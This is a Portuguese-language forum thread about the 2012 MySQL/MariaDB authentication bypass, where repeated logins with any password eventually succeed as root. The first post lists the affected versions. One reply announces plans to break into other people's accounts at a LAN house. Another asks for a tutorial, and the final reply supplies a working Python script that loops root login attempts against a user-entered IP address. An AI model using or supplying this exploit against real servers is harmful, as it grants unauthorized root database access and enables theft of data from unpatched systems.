Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

MySQL Bypass Exploit

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Dica MySQL Bypass Exploit

    O MySQL possui uma vulnerabilidade que permite que qualquer usuário válido se autentifique, usando apenas uma repetição de senhas.


    O que significa que, se alguém sabe um nome de usuário para se conectar (e "root" quase sempre existe), ela pode se conectar usando * qualquer senha * repetindo tentativas de conexão. ~ 300 tentativas leva apenas uma fração de segundo, então basicamente conta a proteção por senha é tão bom como inexistente.

    Todas as versões do MySQL e MariaDB até 5.1.61, 5.2.11, 5.3.5, 5.5.22 são vulneráveis.
    Versões de MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 não são.
    Versões do MySQL 5.1.63 de, 5.5.24, 5.6.6 não são.

    Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Se expressarmos gratidão pelo que temos, teremos mais para expressar gratidão... Agradeça!
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Irei testar, mas se funcionar , eu vou cair na gargalhada como um sistema em pleno 2014 , conceda acesso depois de várias tentativas frustadas de LOGIN, po vou hackiar um monte de nego na Lan house soh vendo o login das contas deles. é frustante ao mesmo tempo engraçado ao pensar que esse sistema não foi criado do dia pra noite.. é galera , Falhas graves.

    Bom topico amigo.
    Conhecimento não é crime!

    Minha missão: Ser o Robin Hood Virtual
    • Top

    Comment

    • Font Size
      #3
      Algum tutorial para isso?
      • Top

      Comment

      • Font Size
        #4
        Postado Originalmente por gugujim Ver Post
        Algum tutorial para isso?
        Segue um exemplo de um script em Python que encontrei na internet para isso:

        Código:
        #!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess
 
ipaddr = raw_input("Enter the IP address of the mysql server: ")
 
while 1:
    subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()
        Se isso não o ajudar, gugujim, me dê um toque.
        Se expressarmos gratidão pelo que temos, teremos mais para expressar gratidão... Agradeça!
        • Top

        Comment

        Anterior template Avançar
        X
        Working...
        X